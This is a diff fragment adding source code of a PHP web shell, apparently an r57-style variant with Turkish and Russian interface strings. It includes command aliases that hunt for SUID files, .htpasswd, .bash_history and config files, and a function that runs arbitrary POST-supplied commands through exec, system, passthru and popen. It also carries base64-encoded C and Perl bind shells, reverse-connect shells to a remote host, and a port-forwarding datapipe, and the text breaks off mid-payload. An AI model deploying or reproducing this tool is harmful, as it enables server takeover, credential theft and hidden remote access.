+&#1042;&#1099; &#1084;&#1086;&#1078;&#1077;&#1090;&#1077; &#1089;&#1072;&#1084;&#1080; &#1076;&#1086;&#1073;&#1072;&#1074;&#1083;&#1103;&#1090;&#1100; &#1080;&#1083;&#1080; &#1080;&#1079;&#1084;&#1077;&#1085;&#1103;&#1090;&#1100; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099;.
+*/
+$aliases=array(
+'Uygun Dosyalari bul'=>'find / -type f -perm -04000 -ls',
+'Genel uygun dosyalari dizinlerde bul'=>'find . -type f -perm -04000 -ls',
+'sgid dosyalari bul'=>'find / -type f -perm -02000 -ls',
+'sgid uygun dosyalari dizinlerde bul'=>'find . -type f -perm -02000 -ls',
+'config.inc.php dosyalarini bul'=>'find / -type f -name config.inc.php',
+'config.inc.php dosyalarini dizinlerde bul'=>'find . -type f -name config.inc.php',
+'config* dosyalarini bul'=>'find / -type f -name "config*"',
+'config* dosyalarini dizinlerde bul'=>'find . -type f -name "config*"',
+'Yazilabilir Dosyalari bul'=>'find / -type f -perm -2 -ls',
+'Yazilabilir Dosyalari dizinlerde bul'=>'find . -type f -perm -2 -ls',
+'Yazilabilir klasorleri bul'=>'find /  -type d -perm -2 -ls',
+'Yazilabilir butun klasorleri dizinlerde bul'=>'find . -type d -perm -2 -ls',
+'Yazilabilir dosya ve klasorleri bul'=>'find / -perm -2 -ls',
+'Yazilabilir butun dosya ve klasorleri dizinlerde bul'=>'find . -perm -2 -ls',
+'Butun service.pwd dosyalarini bul'=>'find / -type f -name service.pwd',
+'service.pwd dosyalarini genel dizinlerde bul'=>'find . -type f -name service.pwd',
+'Butun .htpasswd dosyalarini bul '=>'find / -type f -name .htpasswd',
+'.htpasswd dosylarini genel dizinlerde bul'=>'find . -type f -name .htpasswd',
+'Butun .bash_history dosyalarini bul'=>'find / -type f -name .bash_history',
+'.bash_history dosyalarini genel dizinlerde bul'=>'find . -type f -name .bash_history',
+'Butun .mysql_history dosyalarini bul'=>'find / -type f -name .mysql_history',
+'.mysql_history dosyalarini genel dizinlerde bul'=>'find . -type f -name .mysql_history',
+'Butun .fetchmailrc dosyalarini bul'=>'find / -type f -name .fetchmailrc',
+'.fetchmailrc dosylarini genel dizinlerde bul'=>'find . -type f -name .fetchmailrc',
+'Linux uzerinde erisilebilinen sistem dosyalarini listele'=>'lsattr -va',
+'Acilan portlari goster'=>'netstat -an | grep -i listen',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=FixedSysy color=gray>&#1080;</font>";
+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=Verdana size=-2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+$windows = 0;
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
+if(empty($dir))
+ {
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); }
+ if(empty($os)){ $os ="-"; $unix=1; }
+ else
+    {
+    if(@eregi("^win",$os)) { $windows = 1; }
+    else { $unix = 1; }
+    }
+ }
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
+        $r .= ($windows)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">GERI</a> ]</b></font></div>";
+  die();
+  }
+if($windows&&!$safe_mode)
+ {
+ $uname = ex("ver");
+ if(empty($uname)) { $safe_mode = 1; }
+ }
+else if($unix&&!$safe_mode)
+ {
+ $uname = ex("uname");
+ if(empty($uname)) { $safe_mode = 1; }
+ }
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+function we($i)
+{
+if($GLOBALS['language']=="ru"){ $text = '&#1054;&#1096;&#1080;&#1073;&#1082;&#1072;! &#1053;&#1077; &#1084;&#1086;&#1075;&#1091; &#1079;&#1072;&#1087;&#1080;&#1089;&#1072;&#1090;&#1100; &#1074; &#1092;&#1072;&#1081;&#1083; '; }
+else { $text = "[-] HATA! Dosya yazilabilir de?il ! "; }
+echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function re($i)
+{
+if($GLOBALS['language']=="ru"){ $text = '&#1054;&#1096;&#1080;&#1073;&#1082;&#1072;! &#1053;&#1077; &#1084;&#1086;&#1075;&#1091; &#1087;&#1088;&#1086;&#1095;&#1080;&#1090;&#1072;&#1090;&#1100; &#1092;&#1072;&#1081;&#1083; '; }
+else { $text = "[-] HATA! Dosyayi okuma izni yok! "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function ce($i)
+{
+if($GLOBALS['language']=="ru"){ $text = "&#1053;&#1077; &#1091;&#1076;&#1072;&#1083;&#1086;&#1089;&#1100; &#1089;&#1086;&#1079;&#1076;&#1072;&#1090;&#1100; "; }
+else { $text = "Olusturulamadi "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function perms($mode)
+{
+if ($GLOBALS['windows']) return 0;
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+function in($type,$name,$size,$value)
+{
+ $ret = "<input type=".$type." name=".$name." ";
+ if($size != 0) { $ret .= "size=".$size." "; }
+ $ret .= "value=\"".$value."\">";
+ return $ret;
+}
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or we($fname);
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+function sr($l,$t1,$t2)
+ {
+ return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
+ }
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+function DirFiles($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (FALSE !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(!is_dir($dir."/".$file))
+          {
+            if($types)
+            {
+              $pos = @strrpos($file,".");
+              $ext = @substr($file,$pos,@strlen($file)-$pos);
+              if(@in_array($ext,@explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  function DirFilesWide($dir)
+  {
+    $files = Array();
+    $dirs = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+          {
+            $file = @strtoupper($file);
+            $dirs[$file] = '&lt;DIR&gt;';
+          }
+          else
+            $files[$file] = @filesize($dir."/".$file);
+        }
+      }
+      @closedir($handle);
+      @ksort($dirs);
+      @ksort($files);
+      $files = @array_merge($dirs,$files);
+    }
+    return $files;
+  }
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  function DirPrintHTMLHeaders($dir)
+  {
+    $pockets = '';
+  	$handle = @opendir($dir) or die("Can't open directory $dir");
+    echo "    <ul style='margin-left: 0px; padding-left: 20px;'>\n";
+    while (false !== ($file = @readdir($handle)))
+    {
+      if ($file != "." && $file != "..")
+      {
+        if(@is_dir($dir."/".$file))
+        {
+          echo "      <li><b>[ $file ]</b></li>\n";
+          DirPrintHTMLHeaders($dir."/".$file);
+        }
+        else
+        {
+          $pos = @strrpos($file,".");
+          $ext = @substr($file,$pos,@strlen($file)-$pos);
+          if(@in_array($ext,array('.htm','.html')))
+          {
+            $header = '-=None=-';
+            $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file);
+            for($a=0;$a<count($strings);$a++)
+            {
+              $pattern = '(<title>(.+)</title>)';
+              if(@eregi($pattern,$strings[$a],$pockets))
+              {
+                $header = "&laquo;".$pockets[2]."&raquo;";
+                break;
+              }
+            }
+            echo "      <li>".$header."</li>\n";
+          }
+        }
+      }
+    }
+    echo "    </ul>\n";
+    @closedir($handle);
+  }
+
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
+      $this->titles = Array();
+    }
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          $aa = '';
+          if(($count = @preg_match_all($pattern,$CurString,$aa)))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+  function getmicrotime()
+  {
+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
